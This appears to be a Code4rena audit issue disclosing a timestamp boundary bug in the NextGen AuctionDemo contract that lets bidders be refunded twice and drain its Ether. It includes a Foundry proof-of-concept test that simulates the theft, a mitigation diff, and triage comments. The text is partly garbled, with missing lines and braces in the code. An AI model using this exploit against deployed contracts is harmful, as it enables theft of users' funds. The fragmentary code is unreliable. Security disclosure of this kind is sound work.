Ether from the Auction contract can be stolen on the block the auction ends
c4-submissions opened this issue · 4 comments
Lines of code
Vulnerability details
, cancelBid()
, and cancelAllBids()
all check the auction end time with <=
Due to the =
check, it is possible to claim assets twice. Once in the claim function, and the second one on either of the cancel bid functions.
It is possible to perform the attack with as many non-winning bids as desired.
Steal Ether from the AuctionDemo
The attack can only be performed when block.timestamp == auctionEndTime
. As the protocol will be deployed on Ethereum, this means that the attack can be performed 8,33% of the times (the time between blocks is 12s, so the probability would be 1/12).
Considering the theft of Ether, the success rate being significant, and that it can be performed to steal any amount of assets on one go, the impact was considered as High.
Proof of Concept
All claimAuction()
, cancelBid()
, and cancelAllBids()
check that they can be called validating the following check. This means that they can be called successfully at the same time on that specific timestamp.
block.timestamp >= minter.getAuctionEndTime(_tokenid)
Cancel bid functions do not allow to call them twice, to prevent claiming bids multiple times. So they set status: false
to the bid:
doesn't set that status
to false
. So, it is possible to call it, claim back all the non-winning bids, and they claim back the non-winning bids again with any of the cancel bid functions.
The following coded POC shows how an adversary can drain the AuctionDemo
Coded Proof of Concept
- Run
forge init --no-git --force
to initiate Foundry on the root of the project - Create
and copy the snippet below - Run
forge test
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console2} from "forge-std/Test.sol";
import {auctionDemo} from "smart-contracts/AuctionDemo.sol";
import {NextGenMinterContract} from "smart-contracts/MinterContract.sol";
import {NextGenAdmins} from "smart-contracts/NextGenAdmins.sol";
import {NextGenCore} from "smart-contracts/NextGenCore.sol";
contract StealEtherFromAuctionTest is Test {
NextGenAdmins admin;
NextGenCore gencore;
NextGenMinterContract minter;
auctionDemo auction;
function setUp() public {
admin = new NextGenAdmins();
gencore = new NextGenCore("core", "core", address(admin));
minter = new NextGenMinterContract(address(gencore), address(0), address(admin));
auction = new auctionDemo(address(minter), address(gencore), address(admin));
function testStealEtherFromAuction() public {
address adversary = makeAddr("adversary");
address tokenOwner = makeAddr("tokenOwner");
uint256 tokenId = 1;
// Deal an initial amount of Ether and keep track of the adversary balance
deal(adversary, 15 ether);
deal(address(auction), 10 ether); // @audit this will be all stolen
uint256 adversaryBalanceBefore = adversary.balance;
// Simulate an auction for a token that ends in 12 hours
uint256 auctionEndTime = block.timestamp + 12 hours;
vm.mockCall(address(minter), 0, abi.encodeCall(minter.getAuctionEndTime, (tokenId)), abi.encode(auctionEndTime));
vm.mockCall(address(minter), 0, abi.encodeCall(minter.getAuctionStatus, (tokenId)), abi.encode(true));
// Mock the token transfer in `claimAuction()` to check that it will be called with these specific params
vm.mockCall(address(gencore), 0, abi.encodeCall(gencore.ownerOf, (tokenId)), abi.encode(tokenOwner));
abi.encodeWithSignature("safeTransferFrom(address,address,uint256)", tokenOwner, adversary, tokenId),
// Let's say that the NFT market value is of 4.9 ETH
// An adversary can make a first bid for 1 ETH
auction.participateToAuction{value: 1 ether}(tokenId);
// Then they can make as many as they want, for 1.0001 ETH, 1.0002 ETH, 1.0003 ETH and so on
// There is no additional risk, as they can be canceled, or returned after the auction ends
// For the sake of simplicity, we'll just create a few more with round numbers
auction.participateToAuction{value: 2 ether}(tokenId);
auction.participateToAuction{value: 3 ether}(tokenId);
auction.participateToAuction{value: 4 ether}(tokenId);
// The adversary places the final bid of 5 ETH, just above market price
auction.participateToAuction{value: 5 ether}(tokenId);
// The auction ends
// The adversary will call `claimAuction()` + `cancelAllBids()` on the block the auction ends
// The attack will be successful if the block.timestamp is equal to the auction end time
uint256 adversaryBalanceAfter = adversary.balance;
uint256 auctionBalanceAfter = address(auction).balance;
// The adversary steals Ether, while keeping the bought NFT at just above market price
uint256 stolenBalance = adversaryBalanceAfter - adversaryBalanceBefore;
assertEq(stolenBalance, 5 ether);
// The auction contract is drained
assertEq(auctionBalanceAfter, 0);
Tools Used
Manual Review
Recommended Mitigation Steps
One possible way to mitigate this is to change the comparison to strictly greater >
, for example in claimAuction()
function claimAuction(uint256 _tokenid) public WinnerOrAdminRequired(_tokenid,this.claimAuction.selector){
- block.timestamp >= minter.getAuctionEndTime(_tokenid) &&
+ block.timestamp > minter.getAuctionEndTime(_tokenid) &&
auctionClaim[_tokenid] == false &&
minter.getAuctionStatus(_tokenid) == true
Assessed type
141345 marked the issue as duplicate of #962
alex-ppg marked the issue as not a duplicate
alex-ppg marked the issue as satisfactory